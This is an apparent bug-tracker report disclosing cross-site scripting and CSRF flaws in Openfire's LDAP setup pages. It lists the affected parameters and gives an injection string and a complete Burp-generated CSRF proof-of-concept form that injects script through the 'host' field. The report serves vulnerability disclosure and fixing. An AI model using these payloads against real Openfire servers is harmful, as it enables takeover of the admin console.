XSS in LDAP setup pages

Description

The OpenFire setup configuration pages for LDAP servers has incorrect escaping of field data.

The setup options also fails to use CSRF token handling correctly.

Since the escaping was corrected for other parts of setup this looks like failure to completely address this when fixing other pages in "setup". (Grep is your friend).

Exploit

Proof of Concept from Burp Suite Cross Site Request forgery testing tool shows both the XSS, and that the form is susceptible to cross site request forgery.

When an attacker controls a page and can persuade the admin to visit the malicious page, and then subsequently or concurrently the attacked browser is used to setup an Openfire instance via the web interface with a known IP address or hostname before the control is lost (reboot or close of browser), the attack can obtain control of the openfire admin console and have complete control of the Openfire instance configuration.

 

The export found isn setpu-ldap-server.jsp

Using the string

uid"><plaintext>

for the UID on setup-ldap-user.jsp shows similar issues exist here and elsewhere.

Burp flagged XSS issues in:

/setup/setup-ldap-server.jsp [admindn parameter]
/setup/setup-ldap-server.jsp [adminpwd parameter]
/setup/setup-ldap-server.jsp [basedn parameter]
/setup/setup-ldap-server.jsp [host parameter]
/setup/setup-ldap-user.jsp [birthday parameter]
/setup/setup-ldap-user.jsp [businessCity parameter]
/setup/setup-ldap-user.jsp [businessCountry parameter]
/setup/setup-ldap-user.jsp [businessDepartment parameter]
/setup/setup-ldap-user.jsp [businessFax parameter]
/setup/setup-ldap-user.jsp [businessJobTitle parameter]
/setup/setup-ldap-user.jsp [businessMobile parameter]
/setup/setup-ldap-user.jsp [businessPager parameter]
/setup/setup-ldap-user.jsp [businessPhone parameter]
/setup/setup-ldap-user.jsp [businessState parameter]
/setup/setup-ldap-user.jsp [businessStreet parameter]
/setup/setup-ldap-user.jsp [businessZip parameter]
/setup/setup-ldap-user.jsp [email parameter]
/setup/setup-ldap-user.jsp [fullName parameter]
/setup/setup-ldap-user.jsp [homeCity parameter]
/setup/setup-ldap-user.jsp [homeCountry parameter]
/setup/setup-ldap-user.jsp [homeFax parameter]
/setup/setup-ldap-user.jsp [homeMobile parameter]
/setup/setup-ldap-user.jsp [homePager parameter]
/setup/setup-ldap-user.jsp [homePhone parameter]
/setup/setup-ldap-user.jsp [homeState parameter]
/setup/setup-ldap-user.jsp [homeStreet parameter]
/setup/setup-ldap-user.jsp [homeZip parameter]
/setup/setup-ldap-user.jsp [name parameter]
/setup/setup-ldap-user.jsp [nickname parameter]
/setup/setup-ldap-user.jsp [photo parameter]
/setup/setup-ldap-user.jsp [searchFields parameter]
/setup/setup-ldap-user.jsp [searchFilter parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [serverType parameter]
/setup/setup-ldap-user.jsp [usernameField parameter]
/setup/setup-ldap-user.jsp [usernameField parameter]

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.56.101:9090/setup/setup-ldap-server.jsp" method="POST">
<input type="hidden" name="servertype" value="4" />
<input type="hidden" name="host" value="localhost&quot;&gt;&lt;script&gt;alert&#40;document&#46;domain&#41;&#59;&lt;&#47;script&gt;" />
<input type="hidden" name="port" value="389" />
<input type="hidden" name="basedn" value="base" />
<input type="hidden" name="admindn" value="" />
<input type="hidden" name="adminpwd" value="" />
<input type="hidden" name="connectionpool" value="true" />
<input type="hidden" name="ssl" value="false" />
<input type="hidden" name="starttls" value="false" />
<input type="hidden" name="debug" value="false" />
<input type="hidden" name="referrals" value="false" />
<input type="hidden" name="aliasreferrals" value="true" />
<input type="hidden" name="enclosedns" value="true" />
<input type="hidden" name="test" value="Test&#32;Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> 

Environment

None
Fixed

Assignee

Greg Thomas

Reporter

Simon Waters